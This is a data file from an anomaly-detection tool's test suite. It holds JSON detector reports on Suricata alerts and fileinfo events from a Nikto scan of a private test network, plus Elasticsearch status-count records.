"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46970, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.10:100", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.382965, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":268736087642508,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46970, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":268736087642508,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 268736087642508, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46972 -> 192.168.10.154:80", "/parser/model/time": 1583349514.385406, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46972, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.386008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46972, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1931339402763667, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } 
}logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/elastic.log000066400000000000000000002130261437606560100320130ustar00rootroot00000000000000{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mDPoLXYBIkOurnXX5Icg","_score":1.0,"_source":{"FromTime":1.607087995611796E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":100,"/parser/model/type_str":14916,"/parser/model/classification":0,"/parser/model/status_code":21,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:06.072Z","ToTime":1.607088005611873E9,"fromtimestamp":"2020-12-04T13:19:55.611Z","totimestamp":"2020-12-04T13:20:05.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"nTPpLXYBIkOurnXXC4e7","_score":1.0,"_source":{"FromTime":1.60708800617559E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":36,"/parser/model/type_str":17371,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:16.212Z","ToTime":1.607088016175659E9,"fromtimestamp":"2020-12-04T13:20:06.175Z","totimestamp":"2020-12-04T13:20:16.175Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ojPpLXYBIkOurnXXNodQ","_score":1.0,"_source":{"FromTime":1.607088017076398E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":167,"/parser/model/type_str":10246,"/parser/model/classification":0,"/parser/model/status_code":80,"/parser/model/host":14,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:27.113Z","ToTime":1.607088027076495E9,"fromtimestamp":"2020-12-04T13:20:17.076Z","totimestamp":"2020-12-04T13:20:27.076Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qDPpLXYBIkOurnXXXoc-","_score":1.0,"_source":{"FromTime":1.607088027294802E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":1039,"/parser/model/classification":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":1},"timestamp":"2020-12-04T13:20:37.335Z","ToTime":1.607088037294874E9,"fromtimestamp":"2020-12-04T13:20:27.294Z","totimestamp":"2020-12-04T13:20:37.294Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPpLXYBIkOurnXXiIco","_score":1.0,"_source":{"FromTime":1.607088038027988E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":77,"/parser/model/type_str":3861,"/parser/model/classification":0,"/parser/model/status_code":23,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:48.065Z","ToTime":1.607088048028038E9,"fromtimestamp":"2020-12-04T13:20:38.027Z","totimestamp":"2020-12-04T13:20:48.028Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPpLXYBIkOurnXXsYfd","_score":1.0,"_source":{"FromTime":1.6070880487057E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":3633,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":9,"/parser/model/sp":3},"timestamp":"2020-12-04T13:20:58.742Z","ToTime":1.607088058705801E9,"fromtimestamp":"2020-12-04T13:20:48.705Z","totimestamp":"2020-12-04T13:20:58.705Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uDPpLXYBIkOurnXX3Idz","_score":1.0,"_source":{"FromTime":1.607088059606552E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":84,"/parser/model/type_str":15434,"/parser/model/classification":0,"/parser/model/status_code":27,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:09.644Z","ToTime":1.607088069606614E9,"fromtimestamp":"2020-12-04T13:20:59.606Z","totimestamp":"2020-12-04T13:21:09.606Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPqLXYBIkOurnXXA4f9","_score":1.0,"_source":{"FromTime":1.607088069728031E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":10,"/parser/model/type_str":481,"/parser/model/classification":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:19.766Z","ToTime":1.607088079728122E9,"fromtimestamp":"2020-12-04T13:21:09.728Z","totimestamp":"2020-12-04T13:21:19.728Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wjPqLXYBIkOurnXXLoeH","_score":1.0,"_source":{"FromTime":1.607088080617636E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":72,"/parser/model/type_str":4831,"/parser/model/classification":0,"/parser/model/status_code":33,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:30.656Z","ToTime":1.607088090617719E9,"fromtimestamp":"2020-12-04T13:21:20.617Z","totimestamp":"2020-12-04T13:21:30.617Z","version":"1"}}]}} 